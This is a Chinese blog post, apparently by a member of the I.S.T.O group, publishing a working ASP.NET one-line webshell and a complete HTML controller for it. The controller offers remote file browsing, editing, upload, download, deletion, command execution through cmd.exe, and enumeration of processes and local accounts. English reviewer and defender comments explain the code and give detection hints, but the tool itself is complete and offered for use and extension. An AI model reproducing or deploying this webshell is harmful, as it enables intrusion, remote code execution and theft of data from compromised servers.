服务器端的一句话木马（one-line webshell）代码为：
| 以下是引用片段: <%@ Page Language="Jscript" validateRequest="false" %><%-- Reviewer note: this one line is the whole server side of the shell. Language="Jscript" (JScript.NET) gives the page full .NET access; validateRequest="false" switches off ASP.NET request validation so the script text in the parameter is not rejected as dangerous input; eval(...,"unsafe") executes the raw value of parameter "z" (query string, form field or cookie: HttpRequest.Item checks all of them) and writes whatever the snippet evaluates to into the response. The name "z" is the only shared secret: the client page below must send its snippet in a form field of exactly that name (its KEY box). Detection: grep .aspx files for eval(Request and Language="Jscript"; the commands travel in the POST body, which stock IIS logs do not record, so hunt for the file rather than the traffic. --%><%Response.Write(eval(Request.Item["z"],"unsafe"));%> |
这个一句话木马的原理这里不再赘述，我之前已经发表过文章讲解。
客户端（client）HTML 控制页面代码如下：
| 以下是引用片段: <html> <!-- Reviewer note: attacker-side controller for the eval() one-liner above. Every button assembles a JScript.NET snippet in the browser (setCmdText) and POSTs it to the URL box as a form field whose name is copied from the KEY box (setCmdName, called from check()); the server evaluates that field wholesale, so nothing here is escaped beyond doubling backslashes, and nothing needs to be. Read it to understand the server-side calls a compromised host will make, not as a coding reference. --> <head> <meta http-equiv=Content-Type content="text/html; charset=gb2312"> <title>I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320</title> <style type="text/css"> body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');} /* CSS expression(): Internet Explorer only, draws the table borders at render time */ input,select{font-size:12px;} body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;} td{white-space:nowrap;} a{color:black;text-decoration:none;} </style> <!-- Author: kj021320 Team : I.S.T.O Description: file/folder copy,move and view file down , edit , delete , upload and run server config and user information U can extend the ASPX-C/S-SHELL function and use setCmdText(the js function) to commit the command --> <script language="javascript"> /* Copy server file s to t (System.IO.File.Copy). Backslashes in both paths are doubled so they survive embedding in the generated string literal; double quotes are not escaped, so a path containing one breaks the snippet. */ function copyFile(s,t){ s=s.replace(/\\/g,"\\\\"); t=t.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'",t="'+t+'";System.IO.File.Copy(s,t);'); } /* Start executable s with argument string a under the IIS worker process, capture stdout (UseShellExecute=false, RedirectStandardOutput=true, ReadToEnd) and return it wrapped in <pre>. The second tag is also "<pre>" rather than a closing tag, a typo that leaves the block unclosed. Defender note: with the RunFile box defaulting to cmd.exe this is the textbook w3wp.exe spawning cmd.exe child-process signal. */ function runFile(s,a){ s=s.replace(/\\/g,"\\\\"); a=a.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'",a="'+a+'";var p=new System.Diagnostics.Process();p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.FileName=s;p.StartInfo.Arguments=a;p.Start();var o=p.StandardOutput.ReadToEnd();"<pre>"+o+"<pre>"'); } /* Read f via StreamReader into an HtmlEncode'd <textarea> inside a second POST form. That form carries a hidden field named after the KEY box (address.KEY.value) whose value is another snippet: on "save" it StreamWriter's field t to path fname, so saving is one more round-trip through the same eval(). */ function editFile(f){ f=f.replace(/\\/g,"\\\\"); var code='var stream:System.IO.TextReader,filename,os="",thePath="'+f+'",code;stream=new System.IO.StreamReader(thePath);os=stream.ReadToEnd();os="<form method=post><input name=fname value="+thePath+"><input type=submit name=s value=save><textarea name=t rows=30 style=width:100%;>"+Server.HtmlEncode(os)+"</textarea><input name=\\"'+address.KEY.value+'\\" type=hidden value=\'var stream:System.IO.TextWriter;stream=new System.IO.StreamWriter(Request.Item[\\"fname\\"]);stream.Write(Request.Item[\\"t\\"]);stream.Close();stream=null;Response.Write(\\"OK\\")\'></form>";stream.Close();stream=null;os;'; setCmdText(code); } /* Save the multipart upload named myfile (the file input in the form, enctype multipart/form-data) to server path f; nothing is written to the response. */ function upfile(f){ f=f.replace(/\\/g,"\\\\"); setCmdText('var 
files=Request.Files;if(files.Count!=0)files.Get("myfile").SaveAs("'+f+'");'); } /* Stream f back as a download: Content-Disposition with the URL-encoded file name (the part after the last backslash), Content-Length from the stream, application/octet-stream, a 1024-byte buffered copy into Response.OutputStream, then Response.End(). */ function downFile(f){ f=f.replace(/\\/g,"\\\\"); setCmdText('var stream,filename,bs,os,thePath="'+f+'";Response.Clear();bs=new byte[1024];stream=new System.IO.FileStream(thePath,System.IO.FileMode.Open);filename=thePath.substr(thePath.lastIndexOf("\\\\")+1);Response.AddHeader("Content-Disposition","attachment; filename="+Server.UrlEncode(filename).replace("+"," "));Response.AddHeader("Content-Length",stream.Length);Response.Charset="UTF-8";Response.ContentType="application/octet-stream";os=Response.OutputStream;var i=stream.Read(bs,0,bs.Length);while(i>0){os.Write(bs,0,i);i=stream.Read(bs,0,bs.Length);}os=null;Response.Flush();stream.Close();stream=null;Response.End();'); } /* Dump the current worker process (name, priorities, memory counters, each thread) and every process returned by Process.GetProcesses(proc.MachineName). MaxWorkingSet/MinWorkingSet are wrapped in try/catch, presumably because they can throw for processes the worker account cannot open (unverified). Note the thread loop passes the loop variable p itself while the process loop indexes ps[p]; which form is right depends on what JScript.NET for-in yields for these collections, so confirm before relying on either. */ function ProcessInfo(){ setCmdText('var o;var proc=System.Diagnostics.Process.GetCurrentProcess();o="<h4>CurrentProcessInfor:</h4>";o+=getProcessInfo(proc);var ptc=proc.Threads;for(var p in ptc){o+="<br>"+getProcessThreadInfo(p);}o+="<h4>OtherProcessInfor:</h4>";var ps=System.Diagnostics.Process.GetProcesses(proc.MachineName);for(var p in ps){o+="<br>"+getProcessInfo(ps[p]);}function getProcessThreadInfo(pt:System.Diagnostics.ProcessThread):String{var o="<br>Id:"+pt.Id; o+="<br>BasePriority:"+pt.BasePriority; o+="<br>CurrentPriority:"+pt.CurrentPriority;o+="<br>Site:"+pt.Site;o+="<br>StartAddress:"+pt.StartAddress;o+="<br>ThreadState:"+pt.ThreadState;return o;}function getProcessInfo(proc:System.Diagnostics.Process):String{var 
o="<br>ProcessName:"+proc.ProcessName;o+="<br>BasePriority:"+proc.BasePriority;o+="<br>MachineName:"+proc.MachineName;o+="<br>MainWindowTitle:"+proc.MainWindowTitle;try{o+="<br>MaxWorkingSet:"+proc.MaxWorkingSet;o+="<br>MinWorkingSet:"+proc.MinWorkingSet;}catch(e){}o+="<br>NonpagedSystemMemorySize:"+proc.NonpagedSystemMemorySize;o+="<br>PagedMemorySize:"+proc.PagedMemorySize;o+="<br>PagedSystemMemorySize:"+proc.PagedSystemMemorySize;o+="<br>PeakPagedMemorySize:"+proc.PeakPagedMemorySize;o+="<br>PeakVirtualMemorySize:"+proc.PeakVirtualMemorySize;o+="<br>PeakWorkingSet:"+proc.PeakWorkingSet;o+="<br>PrivateMemorySize:"+proc.PrivateMemorySize;o+="<br>VirtualMemorySize:"+proc.VirtualMemorySize;o+="<br>WorkingSet:"+proc.WorkingSet;return o;}'); } /* List local users and groups through the ADSI WinNT provider (GetObject("WinNT://.")) with per-user description, password, lockout, profile and logon fields; any failure is swallowed by catch(e){}. Known defect, left as is: UserFlags is a bit field, so Flags==65536 / ==64 / ==256 are true only when that single bit is set and no other, which a real account rarely satisfies; the labels imply a bitwise test such as (Flags&65536)!=0. Also confirm which ADS_UF_* bit the "GlobalAccount" label (256) was meant to be. */ function userInfo(){ setCmdText('function getUserInfo(strUser:String):String{var User,Flags,o="";try{ User=GetObject("WinNT://./"+strUser+",user");with(User){o+="<br>Description:"+User.Description+"<br>";o+="PasswordExpired:"+Get("PasswordExpired")+"<br>";Flags=Get("UserFlags");o+="passover:"+(Flags==65536)+"<br>";o+="CannotChangPass:"+(Flags==64)+"<br>";o+="GlobalAccount:"+(Flags==256)+"<br>";o+="PasswordMinimumLength:"+PasswordMinimumLength+"<br>";o+="PasswordRequired:"+PasswordRequired+"<br>";o+="AccountDisabled:"+AccountDisabled+"<br>";o+="IsAccountLocked:"+IsAccountLocked+"<br>";o+="Profile:"+Profile+"<br>";o+="LoginScript:"+LoginScript+"<br>";o+="HomeDirectory:"+HomeDirectory+"<br>";o+="HomeDirDrive:"+Get("HomeDirDrive")+"<br>";o+="AccountExpirationDate:"+AccountExpirationDate+"<br>";o+="BadLoginCount:"+BadLoginCount+"<br>";o+="LastLogin:"+LastLogin+"<br>";o+="LastLogoff:"+LastLogoff+"<br>";}}catch(e){}return o;}function Userinfo():String{var User,Group,Computer,o="";Computer=GetObject("WinNT://.");Computer.Filter=new Array("User");o+="User:<hr>";for(User in Computer){o+="<li>"+User.Name+"</li>";o+=getUserInfo(User.Name);o+="<hr>";}o+="UserGroup:<hr>";Computer.Filter=new Array("Group");for(Group in 
Computer){o+="<li>"+Group.Name+"</li>"+Group.Description+"<hr>";}return o;}Userinfo();'); } /* Delete file s (System.IO.File.Delete). Directories are not handled here; compare moveFile, which checks for both. */ function delFile(s){ s=s.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'";System.IO.File.Delete(s);'); } /* Move s to t: File.Move when s is an existing file, Directory.Move when it is an existing directory. */ function moveFile(s,t){ s=s.replace(/\\/g,"\\\\"); t=t.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'",t="'+t+'";if(System.IO.File.Exists(s))System.IO.File.Move(s,t);if(System.IO.Directory.Exists(s))System.IO.Directory.Move(s,t);'); } /* Host fingerprint: machine name, domain, the account the worker process runs as (Environment.UserName), OS version and the server's LOCAL_ADDR. */ function Info(){ setCmdText('var o="";o+="<br>MachineName:"+Environment.MachineName;o+="<br>UserDomainName:"+Environment.UserDomainName;o+="<br>UserName:"+Environment.UserName;o+="<br>OS:"+Environment.OSVersion;o+="<br>ADDRESS:"+Request.ServerVariables("LOCAL_ADDR");o;'); } /* Runs on "link": point the form at the URL box, rename the hidden command field to the KEY value so it matches the Request.Item name used by the server one-liner, and send Server.MapPath(".") as the connectivity test (echoes the shell's physical directory). */ function check(){ Top.action=Top.URL.value; setCmdName(Top.KEY.value); setCmdText("Server.MapPath(\".\")"); } /* List the subdirectories, then the files, of p one per line. If p does not exist only the "DIR:" heading comes back: the "FILE:" heading sits inside the Exists() branch. */ function listFolder(p){ p=p.replace(/\\/g,"\\\\"); setCmdText('var p="'+p+'",output="";output+="DIR:<br>";if(System.IO.Directory.Exists(p)){var ds=System.IO.Directory.GetDirectories(p);for(var i in ds)output+=ds[i]+"<br>";output+="FILE:<br>";var fs=System.IO.Directory.GetFiles(p);for(var i in fs)output+=fs[i]+"<br>";}output;'); } /* The hidden input with id=Command carries the snippet: setCmdName sets its field name (the KEY), setCmdText its value. */ function setCmdName(n){ getCmd().name=n; } function setCmdText(str){ getCmd().value=str; } function getCmd(){ return document.getElementById("Command"); } </script> </head> <body> <!-- Form "address" posts (multipart, for the upload) into the Display iframe. Every button is type=submit with an onclick that fills the hidden command field first, so one click is one eval round-trip; that field is named "cmd" only until "link" renames it to the KEY value. --> <table width=100% height=100% border=0 bgcolor=menu> <tr><td height=30 colspan=2> <table width=100% height=25 border=0> <form name=address method=post target=Display enctype="multipart/form-data" > <tr><td width=60 align=center>SHELL:</td><td style=width:80%> <input name=URL style=width:90% value="http://127.0.0.1/kj021320.aspx"> KEY: <input name=KEY style=width:5%> <input name=cmd type=hidden id=Command> </td><td align=center><input name=Submit onClick="check();" type=submit value=link> </td></tr> <tr align=center><td>path:</td><td><input name=path style=width:100%></td><td><input name=view type=submit value=view onclick="listFolder(path.value);"></td></tr> 
<tr align=center><td>Opt:</td><td>source:<input name=sname style=width:40%>target:<input name=tname style=width:40%></td><td> <input type=submit name=cp value=copy onclick="copyFile(sname.value,tname.value);"><input type=submit name=mv value=move onclick="moveFile(sname.value,tname.value);"></td></tr> <tr align=center><td>FileOpt:</td><td>Filepath:<input name=fp style=width:80%></td><td><input type=submit name=down value=down onclick="downFile(fp.value);"><input type=submit name=edit onclick="editFile(fp.value);" value=edit><input type=submit name=del value=del onclick="delFile(fp.value);"></td></tr> <tr align=center><td>RunFile:</td><td>Filepath:<input name=rfp value="c:\windows\system32\cmd.exe" style=width:40%>Args:<input name=args style=width:40%></td><td><input type=submit name=run value=run onclick="runFile(rfp.value,args.value);"></td></tr> <tr align=center><td>Info:</td><td><input type=submit name=req value=Info onclick="Info();"><input type=submit name=proc value=Process onclick="ProcessInfo();"><input type=submit name=userInf value=userInfo onclick="userInfo();"></td><td></td></tr> <tr align=center><td>upfile:</td><td><input type=file name=myfile style=width:40%>save:<input type=text name=safile style=width:40%></td><td><input type=submit name=up value=upfile onclick="upfile(safile.value);"></td></tr> </form></table></td></tr><tr><td> <!-- Defender note: the result frame initially loads the author's blog, so merely opening this controller makes a request to blog.csdn.net that egress or proxy logging can catch. --> <iframe name=Display width=100% src=http://blog.csdn.net/I_S_T_O/ height=100% scrolling=yes></iframe> </td></tr></table> </body></html> <script> /* Placed after the closing html tag; Top is the address form in the top frame and is what check() operates on. */ var Top=top.address; </script> |
基本上平时 ASPX Shell 常用的文件操作功能我都加进去了，注册表和数据库操作还没有写；另外多加了进程浏览和用户/用户组浏览。更多功能迟些再更新，具体更新信息请关注 I.S.T.O 开源项目区：http://blog.csdn.net/I_S_T_O/category/325894.aspx 。尚未实现的功能，有兴趣的朋友可以接力 :)